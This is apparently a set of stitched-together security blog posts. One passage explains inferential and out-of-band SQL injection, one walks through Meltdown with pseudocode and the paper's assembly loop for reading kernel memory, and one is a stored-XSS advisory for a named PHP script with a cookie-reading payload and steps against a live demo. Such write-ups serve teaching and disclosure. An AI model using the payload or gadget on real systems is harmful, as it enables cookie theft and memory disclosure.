The two types of inferential SQL Injection are Blind-boolean-based SQLi and Blind-time-based SQLi.

  • Boolean-based (content-based) Blind SQLi

Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

Depending on the result, the content within the HTTP response will change, or remain the same. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database, character by character.

  • Time-based Blind SQLi

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

Depending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned. This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

3. Out-of-band SQLi

Out-of-band SQL Injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results.

Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable).

Out-of-band SQLi techniques would rely on the database server’s ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.

Oops !! WTF is Meltdown & Spectre Vulnerability ?

Meltdown is a cache-timing attack on Intel CPUs that allows all memory to be read by any process because of how they do Speculative Execution. If that sounds like a handful, we wrote this blog for you!

This post includes everything you must know before you can understand Meltdown as a developer (it assumes no knowledge of CPU internals). I highly recommend reading the original paper alongside this from https://meltdownattack.com/meltdown.pdf, I found it to be very readable and extremely well written.

Out of Order / Speculative Execution

Modern CPUs do out-of-order execution whenever they see a branch (if/switch etc). They will typically execute code for multiple branches while the conditional is evaluated. So

if (a+b*c == d)

{

  // first branch

}

else {

  // second branch

}

will involve both the conditions running simultaneously while the condition is evaluated. Once the CPU has the answer (say “true”), it scraps the work from the second branch and commits the first branch. The instructions that are executed out-of-order are called “transient instructions” till they are committed.

The Bug

The code in both the branches can do a lot of things. The assumption is that all of these things will be rolled back once a branch is picked. The attack is possible because cache-state is something that does not seem to be rolled back. This is the crux behind both Meltdown and Spectre attacks.

Meltdown specifically works because “any-random-memory-access” seems to work while in a transient instruction. This attack allows a program to access the memory, and thus also the secrets, of other programs and the operating system.

CPU Cache?

Reading data from RAM is slow when you are a CPU. CPU cache times are in the order of 1-10ns, while RAM access takes >100ns. Almost any memory read/write is placed in the cache: The cache is a mirror image of memory activity on the computer.

Cache Timing?

Let us say I have this piece of code:

$secrets = [“secret1”, “secret2”, “secret3”, “secret4”, “realSecret”];

$realSecret = $secrets[4];

This loads the real secret in memory. An attacker then does the following:

  1. Clear the CPU cache
  2. Runs the above program
  3. Try to access the specific memory address

The above access results in an error, and raises an exception. However, the attacker knows that the secret is in one of the 5 possible locations. Since only one of these is ever read by the actual program, it can repeatedly run the program and time the exception to figure out which one of the locations was being read. The one which is being read is cached, and the exception will be raised much faster as a result.

Cache Timing attacks are the building blocks of Meltdown, which uses them as a side channel to leak data.

The Bug, again

Now that we’ve explained cache-timing attacks (which can tell you “what-memory” is being used by another program), we can get back to Meltdown. Meltdown happens because:

  • CPUs do not rollback CPU-cache after speculative execution, and
  • You can manipulate the cache in those transient instructions to create a “side-channel” and
  • Intel CPUs allow you to read memory from other processes while in a transient instruction.

From the paper:

Meltdown consists of 3 steps:

Step 1. The content of an attacker-chosen memory location, which is inaccessible to the attacker, is loaded into a register.

Step 2. A transient instruction accesses a cache line based on the secret content of the register.

Step 3. The attacker uses Flush+Reload to determine the accessed cache line and hence the secret stored at the chosen memory location.

In slightly more easy words:

  1. Read an inaccessible memory address (this will raise an exception, but we’ll work later on suppressing this)
  2. Depending on the value of the byte at the read address, read a specific value from a known memory location. Do this before the exception is raised, relying on Speculative Execution.
  3. Use a cache-timing attack to see what value was read in 2, and use that to infer the value you wanted to read

    The trick is in executing Step 2 as a transient instruction, which lets us read any memory address, even from another process

In code:

c = *kernel_memory_address;

b = probe[c];

There are several caveats:

Exception Suppressing

If you try to actually read kernel-space memory directly, your program will crash. Meltdown works around this by making sure that the memory is only read in transient instructions that will be rolled back.

So you wrap the above code with:

if (check_function()) {

meltdown();

}

And make sure that check_function always returns false. What happens is that the CPU starts running the code inside meltdown function before it has the result from the check.

Cache Lines

CPU cache are broken down into several cache-lines. Think of them as lookup hashes for your CPU cache. Instead of accessing single-byte (probe[c]), meltdown multiples the memory addresses by 4096 to make sure that the code accessess a specific cache line. So more like:

b = probe[c * 4096];

If you’re wondering why we are doing a read instead of just printing c, or maybe copying it to another place, it is because CPU designers considered that, and rollback those instructions correctly, so any writes cannot be used to exfiltrate the data from a transient instruction.

Zeroes

Sometimes, the exception is raised before the code executes, and the value of c is set to 0 as part of the rollback. This makes the attack unreliable. So, the attack decides to ignore zero-value-reads and only prime the cache if it reads a non-zero value. Thus the whole code becomes

if (check_function()) {

  label retry:

  c = *kernel_memory_address;

  if (c != 0)

    b = probe[c * 4096];

  else

    goto retry;

}

The similar assembly code (from the paper) is:

; rcx = kernel address

; rbx = probe array

retry:

mov al, byte [rcx] ; try to read rcx

shl rax, 0xc ; multiply the read value with 4096 by shifting left 12(0xc) bits

jz retry ; retry if the above is zero

mov rbx, qword [rbx + rax] ; read specific entry in rbx

The special condition where c actually is zero is handled in the cache-timing where we notice no memory address has been cached and decide it was a zero.

References:

 

Website Broker Script – Stored XSS

############################################################################
# Exploit Title: Website Broker Script – Stored XSS
# Date: 11.02.2018
# Exploit Author: Sayan Chatterjee
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/website-broker-script/
# Category: Web Application
# Version: 3.0.6
# Tested on: Windows 10
# CVE: CVE-2018-6900
############################################################################

 

Proof of Concept
=================
URL: https://www.phpscriptsmall.com/product/website-broker-script/
Attack Vector : Last Name
Payload : <svg/onload=alert(document.cookie)>

Reproduction Steps:
——————————
1. Access the above URL
2. Click on “User Demo:
3. Application will be redirected to http://74.124.215.220/~clienemo/prabha/flippa-clone/
4. Go to “Register” and Create a New User
5. Now Login into the application and Click on : My Account ”
6. Click on “Edit Profile” -> Select “Last Name” field and inject <svg/onload=alert(document.cookie)>
7. Persistent XSS will be executed.